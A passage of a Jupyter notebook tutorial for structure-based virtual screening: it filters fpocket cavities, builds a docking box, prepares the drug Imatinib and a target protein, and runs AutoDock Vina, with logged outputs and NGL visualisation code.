"mean_local_hydrophobic_density": 11.0,
"mean_alpha_sphere_radius": 3.563,
"mean_alp_sph_solvent_access": 0.551,
"apolar_alpha_sphere_proportion": 0.39,
"hydrophobicity_score": 30.727,
"volume_score": 5.636,
"polarity_score": 7,
"charge_score": 2,
"proportion_of_polar_atoms": 46.875,
"alpha_sphere_density": 5.926,
"cent_of_mass_alpha_sphere_max_dist": 15.998,
"flexibility": 0.441
},
"pocket10": {
"score": -0.016,
"druggability_score": 0.005,
"number_of_alpha_spheres": 73,
"total_sasa": 161.194,
"polar_sasa": 69.414,
"apolar_sasa": 91.78,
"volume": 538.763,
"mean_local_hydrophobic_density": 16.32,
"mean_alpha_sphere_radius": 3.577,
"mean_alp_sph_solvent_access": 0.485,
"apolar_alpha_sphere_proportion": 0.342,
"hydrophobicity_score": 24.765,
"volume_score": 4.235,
"polarity_score": 6,
"charge_score": 5,
"proportion_of_polar_atoms": 42.857,
"alpha_sphere_density": 5.322,
"cent_of_mass_alpha_sphere_max_dist": 13.95,
"flexibility": 0.329
},
"pocket11": {
"score": -0.045,
"druggability_score": 0.004,
"number_of_alpha_spheres": 36,
"total_sasa": 134.156,
"polar_sasa": 48.415,
"apolar_sasa": 85.742,
"volume": 410.883,
"mean_local_hydrophobic_density": 16.0,
"mean_alpha_sphere_radius": 3.587,
"mean_alp_sph_solvent_access": 0.657,
"apolar_alpha_sphere_proportion": 0.5,
"hydrophobicity_score": -2.3,
"volume_score": 4.5,
"polarity_score": 8,
"charge_score": 0,
"proportion_of_polar_atoms": 38.71,
"alpha_sphere_density": 4.762,
"cent_of_mass_alpha_sphere_max_dist": 13.522,
"flexibility": 0.378
},
"pocket5": {
"score": 0.074,
"druggability_score": 0.003,
"number_of_alpha_spheres": 64,
"total_sasa": 123.274,
"polar_sasa": 55.33,
"apolar_sasa": 67.944,
"volume": 489.525,
"mean_local_hydrophobic_density": 23.394,
"mean_alpha_sphere_radius": 3.616,
"mean_alp_sph_solvent_access": 0.474,
"apolar_alpha_sphere_proportion": 0.516,
"hydrophobicity_score": 43.071,
"volume_score": 4.643,
"polarity_score": 5,
"charge_score": 1,
"proportion_of_polar_atoms": 35.135,
"alpha_sphere_density": 4.823,
"cent_of_mass_alpha_sphere_max_dist": 11.6,
"flexibility": 0.6
},
"pocket2": {
"score": 0.287,
"druggability_score": 0.002,
"number_of_alpha_spheres": 41,
"total_sasa": 10.188,
"polar_sasa": 5.357,
"apolar_sasa": 4.831,
"volume": 119.951,
"mean_local_hydrophobic_density": 5.0,
"mean_alpha_sphere_radius": 3.278,
"mean_alp_sph_solvent_access": 0.426,
"apolar_alpha_sphere_proportion": 0.195,
"hydrophobicity_score": 18.583,
"volume_score": 4.5,
"polarity_score": 8,
"charge_score": 1,
"proportion_of_polar_atoms": 40.741,
"alpha_sphere_density": 3.14,
"cent_of_mass_alpha_sphere_max_dist": 7.536,
"flexibility": 0.23
},
"pocket8": {
"score": 0.011,
"druggability_score": 0.002,
"number_of_alpha_spheres": 40,
"total_sasa": 127.722,
"polar_sasa": 55.264,
"apolar_sasa": 72.458,
"volume": 390.785,
"mean_local_hydrophobic_density": 7.818,
"mean_alpha_sphere_radius": 3.646,
"mean_alp_sph_solvent_access": 0.536,
"apolar_alpha_sphere_proportion": 0.275,
"hydrophobicity_score": 2.182,
"volume_score": 4.0,
"polarity_score": 8,
"charge_score": 1,
"proportion_of_polar_atoms": 43.333,
"alpha_sphere_density": 5.185,
"cent_of_mass_alpha_sphere_max_dist": 12.583,
"flexibility": 0.642
},
"pocket7": {
"score": 0.03,
"druggability_score": 0.001,
"number_of_alpha_spheres": 76,
"total_sasa": 175.922,
"polar_sasa": 101.049,
"apolar_sasa": 74.873,
"volume": 582.784,
"mean_local_hydrophobic_density": 10.952,
"mean_alpha_sphere_radius": 3.707,
"mean_alp_sph_solvent_access": 0.527,
"apolar_alpha_sphere_proportion": 0.276,
"hydrophobicity_score": 9.562,
"volume_score": 4.562,
"polarity_score": 12,
"charge_score": -2,
"proportion_of_polar_atoms": 45.098,
"alpha_sphere_density": 6.008,
"cent_of_mass_alpha_sphere_max_dist": 16.936,
"flexibility": 0.4
},
"pocket12": {
"score": -0.065,
"druggability_score": 0.001,
"number_of_alpha_spheres": 36,
"total_sasa": 84.911,
"polar_sasa": 25.737,
"apolar_sasa": 59.174,
"volume": 255.35,
"mean_local_hydrophobic_density": 17.0,
"mean_alpha_sphere_radius": 3.681,
"mean_alp_sph_solvent_access": 0.565,
"apolar_alpha_sphere_proportion": 0.5,
"hydrophobicity_score": 39.818,
"volume_score": 3.455,
"polarity_score": 3,
"charge_score": -1,
"proportion_of_polar_atoms": 45.833,
"alpha_sphere_density": 2.675,
"cent_of_mass_alpha_sphere_max_dist": 6.432,
"flexibility": 0.588
},
"pocket9": {
"score": 0.003,
"druggability_score": 0.0,
"number_of_alpha_spheres": 61,
"total_sasa": 141.327,
"polar_sasa": 88.192,
"apolar_sasa": 53.136,
"volume": 482.303,
"mean_local_hydrophobic_density": 12.632,
"mean_alpha_sphere_radius": 3.667,
"mean_alp_sph_solvent_access": 0.574,
"apolar_alpha_sphere_proportion": 0.311,
"hydrophobicity_score": 41.429,
"volume_score": 3.714,
"polarity_score": 4,
"charge_score": -1,
"proportion_of_polar_atoms": 45.238,
"alpha_sphere_density": 4.848,
"cent_of_mass_alpha_sphere_max_dist": 12.952,
"flexibility": 0.541
},
"pocket13": {
"score": -0.108,
"druggability_score": 0.0,
"number_of_alpha_spheres": 39,
"total_sasa": 126.606,
"polar_sasa": 68.64,
"apolar_sasa": 57.966,
"volume": 368.26,
"mean_local_hydrophobic_density": 10.0,
"mean_alpha_sphere_radius": 3.837,
"mean_alp_sph_solvent_access": 0.489,
"apolar_alpha_sphere_proportion": 0.282,
"hydrophobicity_score": 28.636,
"volume_score": 4.273,
"polarity_score": 6,
"charge_score": 1,
"proportion_of_polar_atoms": 48.148,
"alpha_sphere_density": 3.758,
"cent_of_mass_alpha_sphere_max_dist": 10.446,
"flexibility": 0.676
}
}
###Markdown
*** Filtering Protein Cavities (fpocket output)Filtering the **protein cavities** (pockets) identified by **fpocket**.In this particular example, the biggest **cavities**, with a **volume** between 800 and 2000 ($Å^{3}$), big enough volume to fit the input small molecule, are selected. *****Building Blocks** used: - [fpocket_filter](https://biobb-vs.readthedocs.io/en/latest/fpocket.htmlmodule-fpocket.fpocket_filter) from **biobb_vs.fpocket.fpocket_filter*****
###Code
from biobb_vs.fpocket.fpocket_filter import fpocket_filter
fpocket_filter_pockets = "fpocket_filter_pockets.zip"
prop = {
"volume": [800, 2000]
}
fpocket_filter(input_pockets_zip=fpocket_all_pockets,
input_summary = fpocket_summary,
output_filter_pockets_zip=fpocket_filter_pockets,
properties=prop)
###Output
2021-05-17 15:44:40,770 [MainThread ] [INFO ] Performing a search under the next parameters: volume: [800, 2000]
2021-05-17 15:44:40,772 [MainThread ] [INFO ] Found 2 matches:
**********
pocket1
**********
score: 0.341
druggability_score: 0.876
volume: 1486.347
**********
pocket6
**********
score: 0.064
druggability_score: 0.028
volume: 1898.144
2021-05-17 15:44:40,774 [MainThread ] [INFO ] Creating 061d0905-ffb1-4c88-8ba1-bc67ed541a5e temporary folder
2021-05-17 15:44:40,782 [MainThread ] [INFO ] Extracting: /home/gbayarri_local/projects/BioBB/tutorials/biobb_wf_virtual-screening/biobb_wf_virtual-screening/notebooks/fpocket/fpocket_all_pockets.zip
2021-05-17 15:44:40,782 [MainThread ] [INFO ] to:
2021-05-17 15:44:40,783 [MainThread ] [INFO ] ['061d0905-ffb1-4c88-8ba1-bc67ed541a5e/pocket10_atm.pdb', '061d0905-ffb1-4c88-8ba1-bc67ed541a5e/pocket10_vert.pqr', '061d0905-ffb1-4c88-8ba1-bc67ed541a5e/pocket11_atm.pdb', '061d0905-ffb1-4c88-8ba1-bc67ed541a5e/pocket11_vert.pqr', '061d0905-ffb1-4c88-8ba1-bc67ed541a5e/pocket12_atm.pdb', '061d0905-ffb1-4c88-8ba1-bc67ed541a5e/pocket12_vert.pqr', '061d0905-ffb1-4c88-8ba1-bc67ed541a5e/pocket13_atm.pdb', '061d0905-ffb1-4c88-8ba1-bc67ed541a5e/pocket13_vert.pqr', '061d0905-ffb1-4c88-8ba1-bc67ed541a5e/pocket14_atm.pdb', '061d0905-ffb1-4c88-8ba1-bc67ed541a5e/pocket14_vert.pqr', '061d0905-ffb1-4c88-8ba1-bc67ed541a5e/pocket1_atm.pdb', '061d0905-ffb1-4c88-8ba1-bc67ed541a5e/pocket1_vert.pqr', '061d0905-ffb1-4c88-8ba1-bc67ed541a5e/pocket2_atm.pdb', '061d0905-ffb1-4c88-8ba1-bc67ed541a5e/pocket2_vert.pqr', '061d0905-ffb1-4c88-8ba1-bc67ed541a5e/pocket3_atm.pdb', '061d0905-ffb1-4c88-8ba1-bc67ed541a5e/pocket3_vert.pqr', '061d0905-ffb1-4c88-8ba1-bc67ed541a5e/pocket4_atm.pdb', '061d0905-ffb1-4c88-8ba1-bc67ed541a5e/pocket4_vert.pqr', '061d0905-ffb1-4c88-8ba1-bc67ed541a5e/pocket5_atm.pdb', '061d0905-ffb1-4c88-8ba1-bc67ed541a5e/pocket5_vert.pqr', '061d0905-ffb1-4c88-8ba1-bc67ed541a5e/pocket6_atm.pdb', '061d0905-ffb1-4c88-8ba1-bc67ed541a5e/pocket6_vert.pqr', '061d0905-ffb1-4c88-8ba1-bc67ed541a5e/pocket7_atm.pdb', '061d0905-ffb1-4c88-8ba1-bc67ed541a5e/pocket7_vert.pqr', '061d0905-ffb1-4c88-8ba1-bc67ed541a5e/pocket8_atm.pdb', '061d0905-ffb1-4c88-8ba1-bc67ed541a5e/pocket8_vert.pqr', '061d0905-ffb1-4c88-8ba1-bc67ed541a5e/pocket9_atm.pdb', '061d0905-ffb1-4c88-8ba1-bc67ed541a5e/pocket9_vert.pqr']
2021-05-17 15:44:40,784 [MainThread ] [INFO ] Creating fpocket_filter_pockets.zip output file
2021-05-17 15:44:40,786 [MainThread ] [INFO ] Adding:
2021-05-17 15:44:40,787 [MainThread ] [INFO ] ['061d0905-ffb1-4c88-8ba1-bc67ed541a5e/pocket1_atm.pdb', '061d0905-ffb1-4c88-8ba1-bc67ed541a5e/pocket1_vert.pqr', '061d0905-ffb1-4c88-8ba1-bc67ed541a5e/pocket6_atm.pdb', '061d0905-ffb1-4c88-8ba1-bc67ed541a5e/pocket6_vert.pqr']
2021-05-17 15:44:40,787 [MainThread ] [INFO ] to: /home/gbayarri_local/projects/BioBB/tutorials/biobb_wf_virtual-screening/biobb_wf_virtual-screening/notebooks/fpocket/fpocket_filter_pockets.zip
2021-05-17 15:44:40,789 [MainThread ] [INFO ] Removed temporary folder: 061d0905-ffb1-4c88-8ba1-bc67ed541a5e
###Markdown
Extract selected pockets (cavities)Extract the selected **pockets** (cavities) from the filtered list (zip file, fpocket_filter_pockets).Writing the information in the ***pockets_dir*** folder.Also saving the list of **PDB files** (protein residues forming the pocket) and **PQR files** (cavity, pocket), to be used in following **visualization step**.
###Code
import os
import shutil
from pathlib import Path, PurePath
import zipfile
if Path(pockets_dir).exists(): shutil.rmtree(pockets_dir)
os.mkdir(pockets_dir)
with zipfile.ZipFile(fpocket_filter_pockets, 'r') as zip_ref:
zip_ref.extractall(pockets_dir)
path_pockets = [str(i) for i in Path(pockets_dir).iterdir()]
path_pockets_pdb = [str(i) for i in Path(pockets_dir).iterdir() if PurePath(i).suffix == '.pdb']
path_pockets_pqr = [str(i) for i in Path(pockets_dir).iterdir() if PurePath(i).suffix == '.pqr']
###Output
_____no_output_____
###Markdown
Visualizing selected pockets (cavities)Visualizing the selected **pockets** (cavities) from the filtered list using **NGL viewer**.**Protein residues** forming the **cavity** are represented in **random-colored surfaces**. **Pockets** are represented in a **blue-colored mesh**. Different **pockets** are identified with a floating **label**.
###Code
import re
import random
# random colors for cavities
r = lambda: random.randint(0,255)
# load structure
view = nglview.NGLWidget()
c = view.add_component(pdb_protein)
# load cavities (d) and pockets (p) and create pocketNames list
c = {}
p = {}
pocketNames = []
for pock in path_pockets:
g = re.findall('(?:pocket)(\d+)(?:_\w+)\.(\w+)', pock)
i = g[0][0]
suff = g[0][1]
if not [item for item in pocketNames if ('pocket' + i) in item]: pocketNames.append(('pocket' + i, int(i)))
if suff == 'pdb':
c[i] = view.add_component(pock)
c[i].clear()
else:
p[i] = view.add_component(pock)
p[i].clear()
# sort pocket names
pocketNames.sort(key=lambda tup: tup[1])
# representation for cavities
for pock in path_pockets_pdb:
g = re.findall('(?:pocket)(\d+)(?:_\w+)\.(\w+)', pock)
i = g[0][0]
c[i].add_surface(color='#%02X%02X%02X' % (r(),r(),r()),
radius='1.5',
lowResolution= True,
# 0: low resolution
smooth=1,
useWorker= True,
wrap= True)
# representation for pockets
for pock in path_pockets_pqr:
g = re.findall('(?:pocket)(\d+)(?:_\w+)\.(\w+)', pock)
i = g[0][0]
p[i].add_surface( component=i, color='skyblue', surfaceType= 'av', contour=True )
view.center()
view._remote_call('setSize', target='Widget', args=['','600px'])
view
# show pocket labels
code = """
var stage = this.stage;
var view = this.stage.viewer;
var clist_len = stage.compList.length;
var i = 0;
for(i = 0; i <= clist_len; i++){
if(stage.compList[i] != undefined && stage.compList[i].structure != undefined && stage.compList[i].object.name.indexOf('pqr') != -1) {
var elm = document.createElement("div");
elm.innerText = 'pocket' + stage.compList[i].object.name.match(/\d+/g)
elm.style.color = "black";
elm.style.background = "rgba(201, 149, 6, .8)";
elm.style.padding = "8px";
stage.compList[i].addAnnotation(stage.compList[i].structure.center, elm)
}
}
"""
view._execute_js_code(code)
view.render_image()
view.download_image(filename='ngl3.png')
view
###Output
_____no_output_____
###Markdown
Select pocket (cavity)Select a specific **pocket** (cavity) from the filtered list to be used in the **docking procedure**. If **fpocket** has been able to identify the correct **binding site**, which we know from the original **protein-ligand structure**, it just needs to be selected. In this particular example, the pocket we are interested in is the **pocket number 6**. Choose a **pocket** from the **DropDown list**:
###Code
mdsel = ipywidgets.Dropdown(
options=pocketNames,
description='Sel. pocket:',
disabled=False,
)
display(mdsel)
###Output
_____no_output_____
###Markdown
*** Extract Pocket Cavity Extract the selected **protein cavity** (pocket) from the **fpocket** results.It will be used to generate the **docking box** in the **following step**.*****Building Blocks** used: - [fpocket_select](https://biobb-vs.readthedocs.io/en/latest/fpocket.htmlmodule-fpocket.fpocket_select) from **biobb_vs.fpocket.fpocket_select*****
###Code
from biobb_vs.fpocket.fpocket_select import fpocket_select
fpocket_cavity = "fpocket_cavity.pdb"
fpocket_pocket = "fpocket_pocket.pqr"
prop = {
"pocket": mdsel.value
}
fpocket_select(input_pockets_zip=fpocket_filter_pockets,
output_pocket_pdb = fpocket_cavity,
output_pocket_pqr=fpocket_pocket,
properties=prop)
###Output
2021-05-17 15:45:08,171 [MainThread ] [INFO ] Creating 7d17de5e-802f-45b7-8830-92f5b35506d7 temporary folder
2021-05-17 15:45:08,174 [MainThread ] [INFO ] Extracting: /home/gbayarri_local/projects/BioBB/tutorials/biobb_wf_virtual-screening/biobb_wf_virtual-screening/notebooks/fpocket/fpocket_filter_pockets.zip
2021-05-17 15:45:08,175 [MainThread ] [INFO ] to:
2021-05-17 15:45:08,176 [MainThread ] [INFO ] ['7d17de5e-802f-45b7-8830-92f5b35506d7/pocket1_atm.pdb', '7d17de5e-802f-45b7-8830-92f5b35506d7/pocket1_vert.pqr', '7d17de5e-802f-45b7-8830-92f5b35506d7/pocket6_atm.pdb', '7d17de5e-802f-45b7-8830-92f5b35506d7/pocket6_vert.pqr']
2021-05-17 15:45:08,178 [MainThread ] [INFO ] Saving fpocket_cavity.pdb file
2021-05-17 15:45:08,179 [MainThread ] [INFO ] Saving fpocket_pocket.pqr file
2021-05-17 15:45:08,181 [MainThread ] [INFO ] Removed temporary folder: 7d17de5e-802f-45b7-8830-92f5b35506d7
###Markdown
*** Generating Cavity Box Generating a **box** surrounding the selected **protein cavity** (pocket), to be used in the **docking procedure**. The **box** is defining the region on the **surface** of the **protein target** where the **docking program** should explore a possible **ligand dock**.An offset of **12 Angstroms** is used to generate a **big enough box** to fit the **small molecule** and its possible rotations.*****Building Blocks** used: - [box](https://biobb-vs.readthedocs.io/en/latest/utils.htmlmodule-utils.box) from **biobb_vs.utils.box*****
###Code
from biobb_vs.utils.box import box
output_box = "box.pdb"
prop = {
"offset": 12,
"box_coordinates": True
}
box(input_pdb_path = fpocket_pocket,
output_pdb_path = output_box,
properties=prop)
###Output
/anaconda3/envs/biobb_VS_tutorial/lib/python3.7/site-packages/Bio/SubsMat/__init__.py:131: BiopythonDeprecationWarning: Bio.SubsMat has been deprecated, and we intend to remove it in a future release of Biopython. As an alternative, please consider using Bio.Align.substitution_matrices as a replacement, and contact the Biopython developers if you still need the Bio.SubsMat module.
BiopythonDeprecationWarning,
2021-05-17 15:45:10,804 [MainThread ] [INFO ] Loading pocket PQR selection from fpocket_pocket.pqr
2021-05-17 15:45:10,807 [MainThread ] [INFO ] Binding site center (Angstroms): 18.588 -3.586 -17.901
2021-05-17 15:45:10,808 [MainThread ] [INFO ] Adding 12.0 Angstroms offset
2021-05-17 15:45:10,809 [MainThread ] [INFO ] Binding site size (Angstroms): 18.884 25.442 23.006
2021-05-17 15:45:10,811 [MainThread ] [INFO ] Volume (cubic Angstroms): 88425
2021-05-17 15:45:10,812 [MainThread ] [INFO ] Adding box coordinates
2021-05-17 15:45:10,814 [MainThread ] [INFO ] Saving output PDB file (with box setting annotations): box.pdb
###Markdown
Visualizing binding site box in 3D structureVisualizing the **protein structure**, the **selected cavity**, and the **generated box**, all together using **NGL** viewer. Using the **original structure** with the **small ligand** inside (Imatinib, [STI](https://www.rcsb.org/ligand/STI)), to check that the **selected cavity** is placed in the **same region** as the **original ligand**.
###Code
view = nglview.NGLWidget()
s = view.add_component(download_pdb)
b = view.add_component(output_box)
p = view.add_component(fpocket_pocket)
p.clear()
atomPair = [
[ "9999:Z.ZN1", "9999:Z.ZN2" ],
[ "9999:Z.ZN2", "9999:Z.ZN4" ],
[ "9999:Z.ZN4", "9999:Z.ZN3" ],
[ "9999:Z.ZN3", "9999:Z.ZN1" ],
[ "9999:Z.ZN5", "9999:Z.ZN6" ],
[ "9999:Z.ZN6", "9999:Z.ZN8" ],
[ "9999:Z.ZN8", "9999:Z.ZN7" ],
[ "9999:Z.ZN7", "9999:Z.ZN5" ],
[ "9999:Z.ZN1", "9999:Z.ZN5" ],
[ "9999:Z.ZN2", "9999:Z.ZN6" ],
[ "9999:Z.ZN3", "9999:Z.ZN7" ],
[ "9999:Z.ZN4", "9999:Z.ZN8" ]
]
# structure
s.add_representation(repr_type='cartoon',
selection='not het',
color='#cccccc',
opacity=.2)
# ligands box
b.add_representation(repr_type='ball+stick',
selection='9999',
color='pink',
aspectRatio = 8)
# lines box
b.add_representation(repr_type='distance',
atomPair= atomPair,
labelVisible=False,
color= 'black')
# pocket
p.add_surface(component=mdsel.value,
color='skyblue',
surfaceType= 'av',
lowResolution= True,
# 0: low resolution
smooth=1,
contour=True,
opacity=0.4,
useWorker= True,
wrap= True )
view.center()
view._remote_call('setSize', target='Widget', args=['','600px'])
view.render_image()
view.download_image(filename='ngl4.png')
view
###Output
_____no_output_____
###Markdown
*** Downloading Small Molecule Downloading the desired **small molecule** to be used in the **docking procedure**. In this particular example, the small molecule of interest is the FDA-approved drug **Imatinib**, with PDB code **STI**.*****Building Blocks** used: - [ideal_sdf](https://biobb-io.readthedocs.io/en/latest/api.htmlmodule-api.ideal_sdf) from **biobb_io.api.ideal_sdf*****
###Code
from biobb_io.api.ideal_sdf import ideal_sdf
sdf_ideal = "ideal.sdf"
prop = {
"ligand_code": ligand_code
}
ideal_sdf(output_sdf_path=sdf_ideal,
properties=prop)
###Output
2021-05-17 15:45:17,292 [MainThread ] [INFO ] Downloading: STI from: ftp://ftp.ebi.ac.uk/pub/databases/msd/pdbechem/files/sdf/STI.sdf
2021-05-17 15:45:17,294 [MainThread ] [INFO ] Writting sdf to: ideal.sdf
###Markdown
*** Converting Small Molecule Converting the desired **small molecule** to be used in the **docking procedure**, from **SDF** format to **PDB** format using the **OpenBabel chemoinformatics** tool. *****Building Blocks** used: - [babel_convert](https://biobb-chemistry.readthedocs.io/en/latest/babelm.htmlmodule-babelm.babel_convert) from **biobb_chemistry.babelm.babel_convert*****
###Code
from biobb_chemistry.babelm.babel_convert import babel_convert
ligand = "ligand.pdb"
prop = {
"input_format": "sdf",
"output_format": "pdb",
"obabel_path": "obabel"
}
babel_convert(input_path = sdf_ideal,
output_path = ligand,
properties=prop)
###Output
2021-05-17 15:45:19,010 [MainThread ] [INFO ] Value is not compatible as a coordinates value
2021-05-17 15:45:19,011 [MainThread ] [INFO ] Not using any container
2021-05-17 15:45:19,129 [MainThread ] [INFO ] obabel -isdf ideal.sdf -opdb -Oligand.pdb
2021-05-17 15:45:19,131 [MainThread ] [INFO ] Exit code 0
2021-05-17 15:45:19,131 [MainThread ] [INFO ] 1 molecule converted
###Markdown
*** Preparing Small Molecule (ligand) for DockingPreparing the **small molecule** structure for the **docking procedure**. Converting the **PDB file** to a **PDBQT file** format (AutoDock PDBQT: Protein Data Bank, with Partial Charges (Q), & Atom Types (T)), needed by **AutoDock Vina**. The process adds **partial charges** and **atom types** to every atom. Besides, the **ligand flexibility** is also defined in the information contained in the file. The concept of **"torsion tree"** is used to represent the **rigid and rotatable** pieces of the **ligand**. A rigid piece (**"root"**) is defined, with zero or more rotatable pieces (**"branches"**), hanging from the root, and defining the **rotatable bonds**.More info about **PDBQT file format** can be found in the [AutoDock FAQ pages](http://autodock.scripps.edu/faqs-help/faq/what-is-the-format-of-a-pdbqt-file).*****Building Blocks** used: - [babel_convert](https://biobb-chemistry.readthedocs.io/en/latest/babelm.htmlmodule-babelm.babel_convert) from **biobb_chemistry.babelm.babel_convert*****
###Code
from biobb_chemistry.babelm.babel_convert import babel_convert
prep_ligand = "prep_ligand.pdbqt"
prop = {
"input_format": "pdb",
"output_format": "pdbqt",
"obabel_path": "obabel"
}
babel_convert(input_path = ligand,
output_path = prep_ligand,
properties=prop)
###Output
2021-05-17 15:45:21,318 [MainThread ] [INFO ] Value is not compatible as a coordinates value
2021-05-17 15:45:21,321 [MainThread ] [INFO ] Not using any container
2021-05-17 15:45:21,399 [MainThread ] [INFO ] obabel -ipdb ligand.pdb -opdbqt -Oprep_ligand.pdbqt
2021-05-17 15:45:21,400 [MainThread ] [INFO ] Exit code 0
2021-05-17 15:45:21,401 [MainThread ] [INFO ] 1 molecule converted
###Markdown
Visualizing small molecule (drug)Visualizing the desired **drug** to be docked to the **target protein**, using **NGL viewer**.- **Left panel**: **PDB-formatted** file, with all hydrogen atoms.- **Right panel**: **PDBqt-formatted** file (AutoDock Vina-compatible), with **united atom model** (only polar hydrogens are placed in the structures to correctly type heavy atoms as hydrogen bond donors).
###Code
from ipywidgets import HBox
v0 = nglview.show_structure_file(ligand)
v1 = nglview.show_structure_file(prep_ligand)
v0._set_size('500px', '')
v1._set_size('500px', '')
def on_change(change):
v1._set_camera_orientation(change['new'])
v0.observe(on_change, ['_camera_orientation'])
HBox([v0, v1])
###Output
_____no_output_____
###Markdown
*** Preparing Target Protein for DockingPreparing the **target protein** structure for the **docking procedure**. Converting the **PDB file** to a **PDBqt file**, needed by **AutoDock Vina**. Similarly to the previous step, the process adds **partial charges** and **atom types** to every target protein atom. In this case, however, we are not taking into account **receptor flexibility**, although **Autodock Vina** allows some limited flexibility of selected **receptor side chains** [(see the documentation)](https://autodock-vina.readthedocs.io/en/latest/docking_flexible.html).*****Building Blocks** used: - [str_check_add_hydrogens](https://biobb-structure-utils.readthedocs.io/en/latest/utils.htmlutils-str-check-add-hydrogens-module) from **biobb_structure_utils.utils.str_check_add_hydrogens*****
###Code
from biobb_structure_utils.utils.str_check_add_hydrogens import str_check_add_hydrogens
prep_receptor = "prep_receptor.pdbqt"
prop = {
"charges": True,
"mode": "auto"
}
str_check_add_hydrogens(input_structure_path = pdb_protein,
output_structure_path = prep_receptor,
properties=prop)
###Output
2021-05-17 15:45:26,940 [MainThread ] [INFO ] check_structure -i /home/gbayarri_local/projects/BioBB/tutorials/biobb_wf_virtual-screening/biobb_wf_virtual-screening/notebooks/fpocket/pdb_protein.pdb -o prep_receptor.pdbqt --force_save add_hydrogen --add_charges --add_mode auto
2021-05-17 15:45:26,942 [MainThread ] [INFO ] Exit code 0
2021-05-17 15:45:26,943 [MainThread ] [INFO ] ===============================================================================
= BioBB structure checking utility v3.7.2 =
= A. Hospital, P. Andrio, J.L. Gelpi 2018-20 =
===============================================================================
Warning: sequence features only available in mmCIF format or with external fasta input
Structure /home/gbayarri_local/projects/BioBB/tutorials/biobb_wf_virtual-screening/biobb_wf_virtual-screening/notebooks/fpocket/pdb_protein.pdb loaded
Title:
Experimental method: unknown
Resolution: None A
Num. models: 1
Num. chains: 1 (A: Protein)
Num. residues: 329
Num. residues with ins. codes: 0
Num. HETATM residues: 0
Num. ligands or modified residues: 0
Num. water mol.: 0
Num. atoms: 2668
Running add_hydrogen. Options: --add_charges --add_mode auto
107 Residues requiring selection on adding H atoms
CYS A39,A119,A162,A211
ASP A43,A88,A101,A112,A124,A125,A145,A150,A161,A168,A205,A227,A230,A283,A292,A294,A313,A315,A316,A321,A324,A331,A335,A343
GLU A12,A19,A22,A71,A81,A97,A98,A160,A163,A192,A215,A245,A253,A286,A317,A328,A336,A344
HIS A64,A77,A80,A107,A126,A142,A148,A199,A228,A305,A312
LYS A15,A45,A53,A54,A66,A76,A79,A118,A121,A139,A152,A165,A233,A248,A249,A267,A287,A295,A338
ARG A5,A10,A23,A49,A57,A67,A70,A73,A94,A136,A149,A186,A189,A220,A237,A256,A296,A330
TYR A9,A24,A69,A103,A132,A140,A188,A200,A258,A307,A311,A323,A342
WARNING: fixing side chains, override with --no_fix_side
Running fixside. Options: --fix all
1 Residues with missing side chain atoms found
PRO A352
Fixing side chains
PRO A352
Fixed 1 side chain(s)
Checking for steric clashes
No severe clashes detected
No apolar clashes detected
No polar_acceptor clashes detected
No polar_donor clashes detected
No positive clashes detected
No negative clashes detected
Selection: auto
Replacing HIS A64 by HIE
Replacing HIS A77 by HIE
Replacing HIS A80 by HIE
Replacing HIS A107 by HIE
Replacing HIS A126 by HIE
Replacing HIS A142 by HIE
Replacing HIS A148 by HIE
Replacing HIS A199 by HIE
Replacing HIS A228 by HIE
Replacing HIS A305 by HIE
Replacing HIS A312 by HIE
Updating partial charges and atom types
Warning: OXT atom missing in CGLY A31. Run backbone --add_atoms first
Warning: OXT atom missing in CPHE A169. Run backbone --add_atoms first
Warning: OXT atom missing in CPRO A352. Run backbone --add_atoms first
Total assigned charge: -2.07
Final Num. models: 1
Final Num. chains: 1 (A: Protein)
Final Num. residues: 329
Final Num. residues with ins. codes: 0
Final Num. HETATM residues: 0
Final Num. ligands or modified residues: 0
Final Num. water mol.: 0
Final Num. atoms: 5353
Structure saved on prep_receptor.pdbqt
###Markdown
*** Running the DockingRunning the **docking process** with the prepared files:- **ligand**- **target protein**- **binding site box**using **AutoDock Vina**. *****Building Blocks** used: - [autodock_vina_run](https://biobb-vs.readthedocs.io/en/latest/vina.htmlmodule-vina.autodock_vina_run) from **biobb_vs.vina.autodock_vina_run*****
###Code
from biobb_vs.vina.autodock_vina_run import autodock_vina_run
output_vina_pdbqt = "output_vina.pdbqt"
output_vina_log = "output_vina.log"
autodock_vina_run(input_ligand_pdbqt_path = prep_ligand,
input_receptor_pdbqt_path = prep_receptor,
input_box_path = output_box,
output_pdbqt_path = output_vina_pdbqt,
output_log_path = output_vina_log)
###Output
2021-05-17 15:45:29,614 [MainThread ] [INFO ] prep_receptor.pdbqt file ends with END, cleaning
2021-05-17 15:45:29,618 [MainThread ] [INFO ] Executing AutoDock Vina
2021-05-17 15:45:29,619 [MainThread ] [INFO ] Not using any container
2021-05-17 15:46:19,009 [MainThread ] [INFO ] vina --ligand prep_ligand.pdbqt --receptor prep_receptor.pdbqt --center_x=18.588 --center_y=-3.586 --center_z=-17.901 --size_x=18.884 --size_y=25.442 --size_z=23.006 --out output_vina.pdbqt --log output_vina.log
2021-05-17 15:46:19,011 [MainThread ] [INFO ] Exit code 0
2021-05-17 15:46:19,011 [MainThread ] [INFO ] #################################################################
# If you used AutoDock Vina in your work, please cite: #
# #
# O. Trott, A. J. Olson, #
# AutoDock Vina: improving the speed and accuracy of docking #
# with a new scoring function, efficient optimization and #
# multithreading, Journal of Computational Chemistry 31 (2010) #
# 455-461 #
# #
# DOI 10.1002/jcc.21334 #
# #
# Please see http://vina.scripps.edu for more information. #
#################################################################
Detected 8 CPUs
Reading input ... done.
Setting up the scoring function ... done.
Analyzing the binding site ... done.
Using random seed: 243047507
Performing search ...
0% 10 20 30 40 50 60 70 80 90 100%
|----|----|----|----|----|----|----|----|----|----|
***************************************************
done.
Refining results ... done.
mode | affinity | dist from best mode
| (kcal/mol) | rmsd l.b.| rmsd u.b.
-----+------------+----------+----------
1 -11.1 0.000 0.000
2 -9.3 1.869 12.340
3 -9.2 2.350 12.298
4 -9.0 7.739 12.329
5 -8.6 5.738 13.064
6 -8.4 7.785 13.782
7 -8.3 7.038 12.298
Writing output ... done.
###Markdown
Visualizing docking output posesVisualizing the generated **docking poses** for the **ligand**, using **NGL viewer**. - **Left panel**: **Docking poses** displayed with atoms coloured by **partial charges** and **licorice** representation.- **Right panel**: **Docking poses** displayed with atoms coloured by **element** and **ball-and-stick** representation.
###Code
from ipywidgets import HBox
models = 'all'
v0 = nglview.show_structure_file(output_vina_pdbqt, default=False)
v0.add_representation(repr_type='licorice',
selection=models,
colorScheme= 'partialCharge')
v0.center()
